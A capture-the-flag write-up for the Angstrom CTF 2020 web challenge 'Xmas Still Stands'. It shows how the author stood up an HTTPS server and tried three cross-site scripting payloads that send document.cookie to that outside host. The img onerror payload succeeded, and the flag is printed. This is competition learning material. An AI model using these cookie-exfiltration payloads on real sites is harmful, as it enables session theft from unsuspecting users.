# Angstrom CTF 2020: [Web] Xmas Still Stands Write Up

## HTTPS Server Setup

We need to stand up our own HTTPS server. It has to be httpS in order to bypass mix-context safety checks.

### Get TLS Certs for HTTPS Server

```
sudo certbot certonly --webroot -w /home/chris_bookholt_gmail_com/tmp/ -d c.science2do.com
```

### Launch HTTPS Server
```sh
FLASK_APP=fserve.py flask run --host=0.0.0.0 --port=443 --cert=/etc/letsencrypt/live/c.science2do.com/fullchain.pem --key=/etc/letsencrypt/live/c.science2do.com/privkey.pem
```

## Attempts

### #1: Fail

```html
<script>
formData = new FormData();
formData.append("content", document.cookie);
xhr = new XMLHttpRequest();
xhr.open('POST', "https://c.science2do.com" + '/post');
xhr.send(formData);
</script>
```

### #2: Fail

```html
<script>
location='https://c.science2do.com/?data='+document.cookie
</script>
```

### #3: Success

Hint source: https://ctftime.org/writeup/18936

```html
<img src=X onerror="location='https://c.science2do.com/?data='+document.cookie"></img>
```
The flag is `actf{s4n1tize_y0ur_html_4nd_y0ur_h4nds}`.

## Useful Techniques

I think my first attempts failed due to XSS filters

### XSS filter evasion techniques
https://owasp.org/www-community/xss-filter-evasion-cheatsheet
